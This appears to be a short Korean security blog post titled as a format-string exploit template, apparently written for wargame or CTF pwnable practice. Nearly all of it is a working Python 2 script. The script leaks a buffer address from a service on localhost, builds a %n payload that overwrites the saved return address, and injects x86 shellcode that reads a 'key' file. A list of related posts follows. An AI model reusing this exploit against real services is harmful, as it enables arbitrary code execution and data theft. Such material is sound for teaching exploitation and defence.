fsb 익스플로잇 기본틀
aa
#/usr/bin/python
from socket import *
from struct import *
# 쉘코드 및 NopSled 지정
nopsled = "\x90"
sc = ""
#sc += nopsled*0x10
sc += "\x55\x89\xe5\x83\xec\x20\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x05\x6a\x79\x66\x68\x6b\x65\x89\xe3\xcd\x80\x89\xc3\xb0\x03\x8d\x4d\xe0\xb2\x21\xcd\x80\x89\xc2\xb0\x04\xb3\x04\xcd\x80\xc9\xc3"
s = socket(AF_INET, SOCK_STREAM)
s.connect(("localhost", 6665))
rv = s.recv(1024)
print rv
# 메모리 릭 프레임
## 문자열 -> int
addrStr = rv[len("Attack 0x"):-3]
addrHex = int(addrStr, 16)
print "addrHex : %X"%addrHex
# 쉘코드가 위치할 주소값 지정. 일단 buffer 값으로 잡아두고 뒤에서 보정
lowBufAddr = int(hex(addrHex)[len("0x"):len("0x")+4],16)
highBufAddr = int(hex(addrHex)[-5:-1],16)
# 버퍼의 ebp 상대주소
buftoebp = 0x198
# 페이로드 작성
payload = ""
payload += pack('<I', addrHex+buftoebp+4) # RET (하위주소)
payload += "AAAA"
payload += pack('<I', addrHex+buftoebp+4+2) # RET + 2 (상위주소)
payload += "AAAA"
# 쉘코드가 위치할 주소값 계산. buf + 페이로드 길이
highBufAddr += len(payload)
print "lowBufAddr = %x"%lowBufAddr
print "highBufAddr = %x"%highBufAddr
payload += sc
# 서식문자 들어가야하는 갯수
cPercentX = 2
payload += "%08x"*cPercentX
length = 4*4 + len(sc) + 8*cPercentX
count1 = highBufAddr - length
count2 = 0x10000+lowBufAddr - highBufAddr #계산값이 음수가 되는 경우 양수계산을 위해
print "c1 : %d, c2 : %d"%(count1, count2)
payload += "%%%dc%%n"%count1
payload += "%%%dc%%n"%count2
print "length : %d"%len(payload)
print "payload : :%s"%payload
s.send(payload)
rv = s.recv(1024)
print rv
s.close()
aa
'Research > Pwnable' 카테고리의 다른 글
| NR advanced exploit lecture (0) | 2017.03.07 |
|---|---|
| Finding environment variable on GDB (0) | 2016.08.30 |
| 보호기법 정리중 (2) | 2014.04.24 |
| linux FILE struct (0) | 2014.02.10 |
| SHA 512, /etc/shadow decrypt (0) | 2014.01.12 |